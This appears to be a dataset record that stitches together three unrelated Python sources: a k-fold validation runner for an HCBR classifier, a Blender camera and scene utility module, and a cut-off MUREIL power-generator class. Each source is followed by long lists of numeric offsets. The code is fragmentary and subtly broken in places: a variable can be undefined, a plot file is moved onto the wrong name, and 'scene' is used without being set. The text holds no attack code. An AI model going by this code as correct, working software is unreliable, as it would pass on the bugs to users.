'z': 'heuristic'
}
def if_exists(k, v):
if k in convert_map:
return convert_map[k], v
else:
return None, None
params = {}
for k, v in paramILS.iteritems():
key, val = if_exists(k, v)
if key is not None:
params[key] = val
return params
def read_outcomes(path):
cases = []
headers = []
with open(path, 'rb') as csvfile:
reader = csvfile.readlines()
n = len(reader[0].split())
for i, row in enumerate(reader):
cases.append(int(row))
return cases
def main():
executable_path = os.path.join(BUILD_FOLDER, EXECUTABLE)
k = int(sys.argv[1])
l = float(sys.argv[2])
instance_name = sys.argv[3]
seed = None
if len(sys.argv) > 4:
seed = sys.argv[4]
only_analysis = False
if len(sys.argv) > 5:
only_analysis = True if sys.argv[5] == 'True' else False
if len(sys.argv) > 6:
nested_CV = True if sys.argv[6] == 'True' else False
suffix = ""
if len(sys.argv) > 7:
suffix = "_" + sys.argv[7]
path = instance_name
file_name = path.split('/')[-1].split('.')[0]
base_name = file_name.split('.')[0]
# Check build, executable and paths
base_output_path = "{}{}".format(instance_name, suffix)
if not only_analysis:
try:
shutil.rmtree(base_output_path)
except:
pass
try:
os.makedirs(base_output_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Create the casebase
print('# Create casebase and outcome files...')
process_script = os.path.join(DATA_FOLDER, "process_{}.py".format(instance_name))
data_location = os.path.join(DATA_FOLDER, "{}.txt".format(instance_name))
cmd = "python {} {}".format(process_script, data_location)
rc = subprocess.call(cmd, shell=True)
print('CMD: {}'.format(cmd))
print('RC: {}'.format(rc))
if rc:
exit(1)
path_casebase = os.path.join("{}_casebase.txt".format(instance_name))
path_outcomes = os.path.join("{}_outcomes.txt".format(instance_name))
try:
outcomes = read_outcomes(path_outcomes)
except Exception as e:
print(e)
exit(1)
n = len(outcomes)
# Create the k-folds
print('# Create k-folds files for validation...')
fold_creation_output = os.path.join(base_output_path, 'kfold_creation.log')
cmd_fold_validation = "python {} {} {} {} {} {} > {}".format(
KFOLD_SCRIPT,
k,
path_casebase,
path_outcomes,
os.path.join(base_output_path, "input_data"),
seed if seed is not None else "",
fold_creation_output
)
print('CMD: {}'.format(cmd_fold_validation))
rc = subprocess.call(cmd_fold_validation, shell=True)
print('RC: {}'.format(rc))
if rc:
exit(1)
# Read configuration
print('# Read configuration for this instance...')
examples = int(round(n * l))
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.params.json".format(instance_name))
default_params = {
# TODO
}
parameters = None
try:
with open(parameters_path) as json_data:
parameters = json.load(json_data)
except Exception as e:
print('[ERROR] Could not retrieve parameters. Use default parameters.')
print(e)
if parameters is None:
parameters = default_params
else:
for key, v in default_params.iteritems():
if key not in parameters:
print('# - Add {}={} as parameter because value not found'.format(key, v))
parameters[key] = v
print('# Configuration: {}'.format(parameters))
# Start validation runs
print('# Start validation runs...')
average_accuracy = 0
for i in range(0, k):
print('\n#########################')
print('# - Run {}'.format(i))
print('#########################')
run_nb = 'run_{}'.format(i)
fold_casebase = os.path.join("../experiments", base_output_path, "input_data", "{}_casebase.fold_{}.txt".format(instance_name, i))
fold_outcomes = os.path.join("../experiments", base_output_path, "input_data", "{}_outcomes.fold_{}.txt".format(instance_name, i))
fold_output_path = os.path.join("../experiments", base_output_path, run_nb)
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.params.json".format(instance_name))
default_params = {
# TODO
}
parameters = None
try:
with open(parameters_path) as json_data:
parameters = json.load(json_data)
except Exception as e:
print('[ERROR] Could not retrieve parameters. Use default parameters.')
print(e)
parameters["input"]["casebase"] = fold_casebase
parameters["input"]["outcomes"] = fold_outcomes
parameters["parameters"]["limit"] = examples
parameters["parameters"]["run_id"] = i
if not only_analysis:
try:
shutil.rmtree(fold_output_path)
except:
pass
try:
os.makedirs(fold_output_path)
except OSError as e:
if e.errno != errno.EEXIST:
print('[ERROR] Could not create output path for {}'.format(run_nb))
continue
if(nested_CV):
print('# Start Meta-optimization for Model Selection')
print('# Preliminary run')
fold_param_file = os.path.join(fold_output_path, 'params_{}.init.json'.format(run_nb))
with open(fold_param_file, 'w') as f:
f.write(json.dumps(parameters, indent=4))
print('# Initial configuration: {}'.format(parameters))
cmd = "{} --params {} > {} 2> {}".format(executable_path,
fold_param_file,
os.path.join(fold_output_path, 'output_{}.init.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.init.txt'.format(run_nb))
)
'''
cmd = "{} -c {} -o {} -l {} -s -p {} -e {} -d {} -g {} {} {} -b {} > {} 2> {}".format(
executable_path,
fold_casebase,
fold_outcomes,
examples,
parameters['learning_phases'],
parameters['eta'],
parameters['delta'],
parameters['gamma'],
'-i' if int(parameters['online']) == 1 else "",
'-z' if int(parameters['heuristic']) == 1 else "",
i,
os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.txt'.format(run_nb))
)
'''
print('# CMD: {}'.format(cmd))
rc = subprocess.call(cmd, shell=True)
p = Popen(['tail', '-n', '1', os.path.join(fold_output_path, 'output_{}.init.txt'.format(run_nb))], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
prun_accuracy = float(output.split()[ACCURACY_ROW])
print('# Preliminary run accuracy: {}'.format(prun_accuracy))
cmd = "python {} \
--weights ../experiments/W.txt \
--mu0 ../experiments/Mu_0_post_training.txt \
--mu1 ../experiments/Mu_1_post_training.txt \
--outcomes {}".format(METAOPTIMIZATION, fold_outcomes)
print('# CMD: {}'.format(cmd))
p = Popen(cmd.split(), stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
parameters_path = os.path.join(DATA_FOLDER, "parameters", "{}.optimized.params.json".format(instance_name))
parameters = json.load(open(parameters_path))
parameters["deserialization"]["mu0_file"] = "../experiments/Mu_0_optimized.txt"
parameters["deserialization"]["mu1_file"] = "../experiments/Mu_1_optimized.txt"
parameters["input"]["casebase"] = fold_casebase
parameters["input"]["outcomes"] = fold_outcomes
parameters["parameters"]["limit"] = examples
parameters["parameters"]["run_id"] = i
fold_param_file = os.path.join(fold_output_path, 'params_{}.json'.format(run_nb))
with open(fold_param_file, 'w') as f:
f.write(json.dumps(parameters, indent=4))
print('# Final configuration: {}'.format(parameters))
cmd = "{} --params {} > {} 2> {}".format(executable_path,
fold_param_file,
os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)),
os.path.join(fold_output_path, 'log_{}.txt'.format(run_nb))
)
print('# CMD: {}'.format(cmd))
rc = subprocess.call(cmd, shell=True)
try:
shutil.move("training.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "training.run_{}.log.csv".format(i)))
shutil.move("prediction.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "prediction.run_{}.log.csv".format(i)))
shutil.move("overlap.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "overlap.run_{}.log.csv".format(i)))
shutil.move("strength.run_{}.log.csv".format(i), os.path.join(base_output_path, "run_{}".format(i), "strength.run_{}.log.csv".format(i)))
except Exception as e:
pass
p = Popen(['tail', '-n', '1', os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
run_accuracy = float(output.split()[ACCURACY_ROW])
average_accuracy += run_accuracy
print("# Accuracy: {}".format(run_accuracy))
print('# Analyze the results...')
try:
# Confusion matrix
cmd_confusion_matrix = "python ../utils/confusion_matrix.py {}".format(os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)))
cmd_cm_gp = "gnuplot {}".format('output_{}_confusion_matrix.gp'.format(run_nb))
rc = subprocess.call(cmd_confusion_matrix, shell=True)
rc = subprocess.call(cmd_cm_gp, shell=True)
shutil.move('output_{}_confusion_matrix.gp'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix.gp'.format(run_nb)))
shutil.move('output_{}_confusion_matrix.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix.txt'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_0.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_0.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_1.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_1.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_2.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_2.png'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_0.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_0.svg'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_1.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_1.svg'.format(run_nb)))
shutil.move('output_{}_confusion_matrix_2.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_confusion_matrix_2.svg'.format(run_nb)))
# Prediction analysis
cmd_prediction_analysis ="python ../utils/prediction_analysis.py {path} ".format(
path=os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))
)
cmd_pa_gp = "gnuplot {}".format('output_{}_diff_pred.gp'.format(run_nb))
rc = subprocess.call(cmd_prediction_analysis, shell=True)
rc = subprocess.call(cmd_pa_gp, shell=True)
shutil.move('output_{}_diff_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_negative_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_negative_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_negative_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_negative_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_positive_bad_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_positive_bad_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred.txt'.format(run_nb)))
shutil.move('output_{}_positive_diff_pred.txt'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_positive_diff_pred.txt'.format(run_nb)))
shutil.move('output_{}_diff_pred.gp'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred.gp'.format(run_nb)))
shutil.move('output_{}_diff_pred_0.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.png'.format(run_nb)))
shutil.move('output_{}_diff_pred_1.png'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.png'.format(run_nb)))
shutil.move('output_{}_diff_pred_0.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.svg'.format(run_nb)))
shutil.move('output_{}_diff_pred_1.svg'.format(run_nb), os.path.join(base_output_path, "run_{}".format(i), 'output_{}_diff_pred_0.svg'.format(run_nb)))
# ROC
cmd_roc ="python ../utils/roc.py {path} ".format(
path=os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb))
)
print('CMD: {}'.format(cmd_roc))
rc = subprocess.call(cmd_roc, shell=True)
shutil.move('roc.png', os.path.join(base_output_path, "run_{}".format(i), 'roc.png'))
# Time
cmd_time ="python ../utils/time_analysis.py {path} ".format(
path=os.path.join(os.path.join(fold_output_path, 'output_{}.txt'.format(run_nb)))
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, "run_{}".format(i), 'output_{}_time.gp'.format(run_nb)).format(run_nb))
#rc = subprocess.call(cmd_time, shell=True)
#rc = subprocess.call(cmd_time_gp, shell=True)
except Exception as e:
print(e)
print('# Analyze all runs...')
try:
cmd_analyze_runs ="python ../utils/analyze_runs.py {path} {instance} {k} {instance} 'table:{instance}' '{caption}'".format(
instance=instance_name,
path="hcbr.global.log.csv" if not only_analysis else os.path.join(base_output_path, "hcbr.global.log.csv"),
k=k,
caption="Confusion matrix and performances indicators for the \\texttt{" + instance_name +"} dataset."
)
rc = subprocess.call(cmd_analyze_runs, shell=True)
print('CMD: {}'.format(cmd_analyze_runs))
cmd_confusion_matrix = "python ../utils/confusion_matrix.py {}".format(os.path.join(base_output_path, 'output.average.txt'))
cmd_cm_gp = "gnuplot {}".format('output_confusion_matrix.gp')
rc = subprocess.call(cmd_confusion_matrix, shell=True)
rc = subprocess.call(cmd_cm_gp, shell=True)
shutil.move('output_confusion_matrix.gp', os.path.join(base_output_path, 'output_confusion_matrix.gp'))
shutil.move('output_confusion_matrix.txt', os.path.join(base_output_path, 'output_confusion_matrix.txt'))
shutil.move('output_confusion_matrix_0.png', os.path.join(base_output_path, 'output_confusion_matrix_0.png'))
shutil.move('output_confusion_matrix_1.png', os.path.join(base_output_path, 'output_confusion_matrix_1.png'))
shutil.move('output_confusion_matrix_2.png', os.path.join(base_output_path, 'output_confusion_matrix_2.png'))
shutil.move('output_confusion_matrix_0.svg', os.path.join(base_output_path, 'output_confusion_matrix_0.svg'))
shutil.move('output_confusion_matrix_1.svg', os.path.join(base_output_path, 'output_confusion_matrix_1.svg'))
shutil.move('output_confusion_matrix_2.svg', os.path.join(base_output_path, 'output_confusion_matrix_2.svg'))
# Prediction analysis
cmd_prediction_analysis ="python ../utils/prediction_analysis.py {path} ".format(
path=os.path.join(base_output_path, 'output.average.txt')
)
cmd_pa_gp = "gnuplot {}".format('output.average_diff_pred.gp')
rc = subprocess.call(cmd_prediction_analysis, shell=True)
rc = subprocess.call(cmd_pa_gp, shell=True)
shutil.move('output.average_diff_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_bad_pred.txt'))
shutil.move('output.average_diff_negative_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_negative_bad_pred.txt'))
shutil.move('output.average_diff_negative_pred.txt', os.path.join(base_output_path, 'output.average_diff_negative_pred.txt'))
shutil.move('output.average_diff_positive_bad_pred.txt', os.path.join(base_output_path, 'output.average_diff_positive_bad_pred.txt'))
shutil.move('output.average_diff_pred.txt', os.path.join(base_output_path, 'output.average_diff_pred.txt'))
shutil.move('output.average_positive_diff_pred.txt', os.path.join(base_output_path, 'output.average_positive_diff_pred.txt'))
shutil.move('output.average_diff_pred.gp', os.path.join(base_output_path, 'output.average_diff_pred.gp'))
shutil.move('output.average_diff_pred_0.png', os.path.join(base_output_path, 'output.average_diff_pred_0.png'))
shutil.move('output.average_diff_pred_1.png', os.path.join(base_output_path, 'output.average_diff_pred_1.png'))
shutil.move('output.average_diff_pred_0.svg', os.path.join(base_output_path, 'output.average_diff_pred_0.svg'))
shutil.move('output.average_diff_pred_1.svg', os.path.join(base_output_path, 'output.average_diff_pred_1.svg'))
# ROC
cmd_roc ="python ../utils/roc.py {path} ".format(
path=os.path.join(base_output_path, 'output.average.txt')
)
print('CMD: {}'.format(cmd_roc))
rc = subprocess.call(cmd_roc, shell=True)
shutil.move('roc.png', os.path.join(base_output_path, 'roc.png'))
# Time
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'output.average.txt'),
column=10
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'output.average_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'overlap.average.log.csv'),
column=3
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'overlap.average.log_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'strength.average.log.csv'),
column=5
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'strength.average.log_time.gp'))
rc = subprocess.call(cmd_time, shell=True)
rc = subprocess.call(cmd_time_gp, shell=True)
cmd_time ="python ../utils/time_analysis.py {path} {column}".format(
path=os.path.join(base_output_path, 'training.average.log.csv'),
column=1
)
cmd_time_gp = "gnuplot {}".format(os.path.join(base_output_path, 'training.average.log_time.gp'))
#rc = subprocess.call(cmd_time, shell=True)
#rc = subprocess.call(cmd_time_gp, shell=True)
except Exception as e:
print(e)
if not only_analysis:
print('# Copy the results...')
shutil.move("hcbr.global.log.csv", os.path.join(base_output_path, "hcbr.global.log.csv"))
shutil.move("{}_casebase.txt".format(instance_name), os.path.join(base_output_path, "{}_casebase.txt".format(instance_name)))
shutil.move("{}_outcomes.txt".format(instance_name), os.path.join(base_output_path, "{}_outcomes.txt".format(instance_name)))
msg = "{} {} {}\n".format(instance_name, seed, average_accuracy / float(k))
sys.stderr.write(msg)
print(msg)
if __name__ == '__main__':
main() | [
[
[
7,
11
],
[
4054,
4058
],
[
5531,
5535
],
[
6622,
6626
],
[
8971,
8975
],
[
9597,
9601
]
],
[
[
19,
21
],
[
1206,
1208
],
[
2043,
2045
],
[
2277,
2279
],
[
2366,
2368
],
[
2668,
2670
],
[
2746,
2748
],
[
3083,
3085
],
[
3313,
3315
],
[
3789,
3791
],
[
4900,
4902
],
[
5040,
5042
],
[
5182,
5184
],
[
5266,
5268
],
[
6071,
6073
],
[
6470,
6472
],
[
6867,
6869
],
[
6960,
6962
],
[
8052,
8054
],
[
8852,
8854
],
[
9458,
9460
],
[
9826,
9828
],
[
9910,
9912
],
[
10170,
10172
],
[
10326,
10328
],
[
10481,
10483
],
[
10634,
10636
],
[
10821,
10823
],
[
11303,
11305
],
[
11667,
11669
],
[
11840,
11842
],
[
12016,
12018
],
[
12194,
12196
],
[
12372,
12374
],
[
12550,
12552
],
[
12728,
12730
],
[
12906,
12908
],
[
13171,
13173
],
[
13542,
13544
],
[
13719,
13721
],
[
13901,
13903
],
[
14083,
14085
],
[
14256,
14258
],
[
14425,
14427
],
[
14593,
14595
],
[
14767,
14769
],
[
14931,
14933
],
[
15095,
15097
],
[
15259,
15261
],
[
15470,
15472
],
[
15681,
15683
],
[
15870,
15872
],
[
15883,
15885
],
[
16007,
16009
],
[
16556,
16558
],
[
16944,
16946
],
[
17246,
17248
],
[
17359,
17361
],
[
17475,
17477
],
[
17593,
17595
],
[
17711,
17713
],
[
17829,
17831
],
[
17947,
17949
],
[
18065,
18067
],
[
18268,
18270
],
[
18585,
18587
],
[
18718,
18720
],
[
18856,
18858
],
[
18994,
18996
],
[
19124,
19126
],
[
19249,
19251
],
[
19373,
19375
],
[
19503,
19505
],
[
19623,
19625
],
[
19743,
19745
],
[
19863,
19865
],
[
20031,
20033
],
[
20216,
20218
],
[
20381,
20383
],
[
20509,
20511
],
[
20767,
20769
],
[
20899,
20901
],
[
21162,
21164
],
[
21295,
21297
],
[
21559,
21561
],
[
21692,
21694
],
[
22017,
22019
],
[
22133,
22135
],
[
22267,
22269
]
],
[
[
23,
28
],
[
2128,
2133
],
[
6164,
6169
]
],
[
[
36,
39
],
[
1258,
1261
],
[
1285,
1288
],
[
1318,
1321
],
[
1357,
1360
],
[
1387,
1390
],
[
1436,
1439
],
[
1483,
1486
],
[
1527,
1530
],
[
1570,
1573
],
[
1630,
1633
],
[
1668,
1671
],
[
22433,
22436
]
],
[
[
47,
51
]
],
[
[
59,
65
],
[
1953,
1959
],
[
5965,
5971
],
[
10121,
10127
],
[
10275,
10281
],
[
10433,
10439
],
[
10585,
10591
],
[
11607,
11613
],
[
11779,
11785
],
[
11953,
11959
],
[
12131,
12137
],
[
12309,
12315
],
[
12487,
12493
],
[
12665,
12671
],
[
12843,
12849
],
[
13484,
13490
],
[
13652,
13658
],
[
13838,
13844
],
[
14016,
14022
],
[
14202,
14208
],
[
14362,
14368
],
[
14540,
14546
],
[
14711,
14717
],
[
14875,
14881
],
[
15039,
15045
],
[
15203,
15209
],
[
15658,
15664
],
[
17204,
17210
],
[
17316,
17322
],
[
17430,
17436
],
[
17548,
17554
],
[
17666,
17672
],
[
17784,
17790
],
[
17902,
17908
],
[
18020,
18026
],
[
18537,
18543
],
[
18661,
18667
],
[
18803,
18809
],
[
18937,
18943
],
[
19080,
19086
],
[
19196,
19202
],
[
19330,
19336
],
[
19457,
19463
],
[
19577,
19583
],
[
19697,
19703
],
[
19817,
19823
],
[
20193,
20199
],
[
21982,
21988
],
[
22080,
22086
],
[
22214,
22220
]
],
[
[
73,
83
],
[
2504,
2514
],
[
3518,
3528
],
[
7973,
7983
],
[
10055,
10065
],
[
11476,
11486
],
[
11543,
11553
],
[
13350,
13360
],
[
13420,
13430
],
[
15609,
15619
],
[
16768,
16778
],
[
17081,
17091
],
[
17144,
17154
],
[
18415,
18425
],
[
18481,
18491
],
[
20148,
20158
],
[
20580,
20590
],
[
20631,
20641
],
[
20975,
20985
],
[
21026,
21036
],
[
21372,
21382
],
[
21423,
21433
]
],
[
[
107,
112
],
[
8026,
8031
],
[
8714,
8719
],
[
10795,
10800
]
],
[
[
114,
118
],
[
8128,
8132
],
[
8141,
8145
],
[
8154,
8158
],
[
8739,
8743
],
[
8752,
8756
],
[
8765,
8769
],
[
10892,
10896
],
[
10905,
10909
],
[
10918,
10922
]
],
[
[
120,
130
],
[
1233,
1243
]
],
[
[
149,
161
],
[
1219,
1231
]
],
[
[
175,
186
],
[
2290,
2301
],
[
2379,
2390
],
[
3802,
3813
],
[
5279,
5290
],
[
8865,
8876
]
],
[
[
199,
211
],
[
3218,
3230
]
],
[
[
236,
248
],
[
8259,
8271
],
[
11014,
11026
]
],
[
[
338,
354
],
[
8614,
8630
]
],
[
[
395,
426
]
],
[
[
915,
928
],
[
2836,
2849
]
],
[
[
1176,
1180
],
[
22513,
22517
]
]
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: DIYer22@github
@mail: ylxx@live.com
Created on Thu Jan 16 18:17:20 2020
"""
from boxx import *
from boxx import deg2rad, np, pi
import bpy
import random
def set_cam_pose(cam_radius=1, cam_deg=45, cam_x_deg=None, cam=None):
cam_rad = deg2rad(cam_deg)
if cam_x_deg is None:
cam_x_deg = random.uniform(0, 360)
cam_x_rad = deg2rad(cam_x_deg)
z = cam_radius * np.sin(cam_rad)
xy = (cam_radius ** 2 - z ** 2) ** 0.5
x = xy * np.cos(cam_x_rad)
y = xy * np.sin(cam_x_rad)
cam = cam or bpy.data.objects["Camera"]
cam.location = x, y, z
cam.rotation_euler = pi / 2 - cam_rad, 0.1, pi / 2 + cam_x_rad
cam.scale = (0.1,) * 3
return cam
def set_cam_intrinsic(cam, intrinsic_K, hw=None):
"""
K = [[f_x, 0, c_x],
[0, f_y, c_y],
[0, 0, 1]]
Refrence: https://www.rojtberg.net/1601/from-blender-to-opencv-camera-and-back/
"""
if hw is None:
scene = bpy.context.scene
hw = scene.render.resolution_y, scene.render.resolution_x
near = lambda x, y=0, eps=1e-5: abs(x - y) < eps
assert near(intrinsic_K[0][1], 0)
assert near(intrinsic_K[1][0], 0)
h, w = hw
f_x = intrinsic_K[0][0]
f_y = intrinsic_K[1][1]
c_x = intrinsic_K[0][2]
c_y = intrinsic_K[1][2]
cam = cam.data
cam.shift_x = -(c_x / w - 0.5)
cam.shift_y = (c_y - 0.5 * h) / w
cam.lens = f_x / w * cam.sensor_width
pixel_aspect = f_y / f_x
scene.render.pixel_aspect_x = 1.0
scene.render.pixel_aspect_y = pixel_aspect
def remove_useless_data():
"""
remove all data and release RAM
"""
for block in bpy.data.meshes:
if block.users == 0:
bpy.data.meshes.remove(block)
for block in bpy.data.materials:
if block.users == 0:
bpy.data.materials.remove(block)
for block in bpy.data.textures:
if block.users == 0:
bpy.data.textures.remove(block)
for block in bpy.data.images:
if block.users == 0:
bpy.data.images.remove(block)
def clear_all():
[
bpy.data.objects.remove(obj)
for obj in bpy.data.objects
if obj.type in ("MESH", "LIGHT", "CURVE")
]
remove_useless_data()
def set_shading_mode(mode="SOLID", screens=[]):
"""
Performs an action analogous to clicking on the display/shade button of
the 3D view. Mode is one of "RENDERED", "MATERIAL", "SOLID", "WIREFRAME".
The change is applied to the given collection of bpy.data.screens.
If none is given, the function is applied to bpy.context.screen (the
active screen) only. E.g. set all screens to rendered mode:
set_shading_mode("RENDERED", bpy.data.screens)
"""
screens = screens if screens else [bpy.context.screen]
for s in screens:
for spc in s.areas:
if spc.type == "VIEW_3D":
spc.spaces[0].shading.type = mode
break # we expect at most 1 VIEW_3D space
def add_stage(size=2, transparency=False):
"""
add PASSIVE rigidbody cube for physic stage or depth background
Parameters
----------
size : float, optional
size of stage. The default is 2.
transparency : bool, optional
transparency for rgb but set limit for depth. The default is False.
"""
import bpycv
bpy.ops.mesh.primitive_cube_add(size=size, location=(0, 0, -size / 2))
stage = bpy.context.active_object
stage.name = "stage"
with bpycv.activate_obj(stage):
bpy.ops.rigidbody.object_add()
stage.rigid_body.type = "PASSIVE"
if transparency:
stage.rigid_body.use_margin = True
stage.rigid_body.collision_margin = 0.04
stage.location.z -= stage.rigid_body.collision_margin
material = bpy.data.materials.new("transparency_stage_bpycv")
material.use_nodes = True
material.node_tree.nodes.clear()
with bpycv.activate_node_tree(material.node_tree):
bpycv.Node("ShaderNodeOutputMaterial").Surface = bpycv.Node(
"ShaderNodeBsdfPrincipled", Alpha=0
).BSDF
stage.data.materials.append(material)
return stage
if __name__ == "__main__":
pass
| [
[
[
154,
155
]
],
[
[
173,
180
],
[
301,
308
],
[
403,
410
]
],
[
[
182,
184
],
[
443,
445
],
[
515,
517
],
[
546,
548
]
],
[
[
186,
188
],
[
660,
662
],
[
683,
685
]
],
[
[
197,
200
],
[
581,
584
],
[
996,
999
],
[
1684,
1687
],
[
1742,
1745
],
[
1790,
1793
],
[
1851,
1854
],
[
1902,
1905
],
[
1962,
1965
],
[
2012,
2015
],
[
2070,
2073
],
[
2181,
2184
],
[
2133,
2136
],
[
2800,
2803
],
[
3378,
3381
],
[
3461,
3464
],
[
3556,
3559
],
[
3844,
3847
]
],
[
[
208,
214
],
[
364,
370
]
],
[
[
221,
233
]
],
[
[
750,
767
]
],
[
[
1592,
1611
],
[
2258,
2277
]
],
[
[
2106,
2115
]
],
[
[
2286,
2302
]
],
[
[
3023,
3032
]
]
] |
#
#
# Copyright (C) University of Melbourne 2013
#
#
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#
#
"""Module subclassing TxMultiGeneratorBase that provides an implementation for
multi-site generators.
"""
from tools import mureilexception, mureilbuilder
import copy
import numpy
from generator import txmultigeneratorbase
import logging
logger = logging.getLogger(__name__)
class TxMultiGeneratorMultiSite(txmultigeneratorbase.TxMultiGeneratorBase):
"""Module subclassing TxMultiGeneratorBase that provides an implementation of
state_handle and related handling functions for multi-site generators.
The 'capacity' term in state_handle is implemented as a dict with one item per site.
Each site item is a list of tuples containing (site_index,build_period,decommissioning_period),
describing the set of installed capacity.
"""
def __init__(self):
"""Initialise as for the base class, and also initialise the params_to_site map.
"""
txmultigeneratorbase.TxMultiGeneratorBase.__init__(self)
# params_to_site maps the index in the params list to the site indices.
self.params_to_site = []
def get_config_spec(self):
"""Return a list of tuples of format (name, conversion function, default),
e.g. ('capex', float, 2.0). Put None if no conversion required, or if no
default value, e.g. ('name', None, None)
Configuration:
time_period_yrs: float - the length of the time period in years
time_scale_up_mult: float - the value to multiply non-discounted items,
such as carbon emissions, by to account for a shorter dataset than the
calculation period length.
variable_cost_mult: as for time_scale_up_mult, but may include a factor for
cost discounting.
size: float, optional - relates param to new capacity
carbon_price_m: float - carbon price in $M/tonne
startup_data_name: string, optional - the name of the data array that contains
data on startup capacities.
startup_data_string: string, optional - a python format data array suitable for
input into set_startup_state, all on a single line.
params_to_site_data_name: string, optional - the name of the data array that
contains a list of how the input params list maps to site indices.
params_to_site_data_string: list of integers, optional - the site indices,
listed separated by spaces, defining the site index corresponding to
each optimisation param, in order.
vom: float, default 0 - variable operating and maintenance cost, in $/MWh, same for all sites
capital_cost: float, default 0 - cost in $M per MW for new capacity.
install_cost: float, default 0 - cost in $M per site, when site has an
installation from this generator for the first time.
decommissioning_cost: float, optional (default 0) - cost in $M per MW for
decommissioning.
lifetime_yrs: float, default 20 - the time in years that new capacity lasts
"""
return txmultigeneratorbase.TxMultiGeneratorBase.get_config_spec(self) + [
('variable_cost_mult', float, 1.0),
('time_scale_up_mult', float, 1.0),
('carbon_price_m', float, 0.0),
('startup_data_name', None, ''),
('startup_data_string', mureilbuilder.python_eval, 'None'),
('params_to_site_data_name', None, ''),
('params_to_site_data_string', mureilbuilder.make_int_list, ''),
('decommissioning_cost', float, 0),
('vom', float, 0),
('capital_cost', float, 0),
('install_cost', float, 0),
('time_period_yrs', float, None),
('lifetime_yrs', float, 20),
('size', float, 1.0),
('start_min_param', int, 1e20),
('start_max_param', int, 1e20),
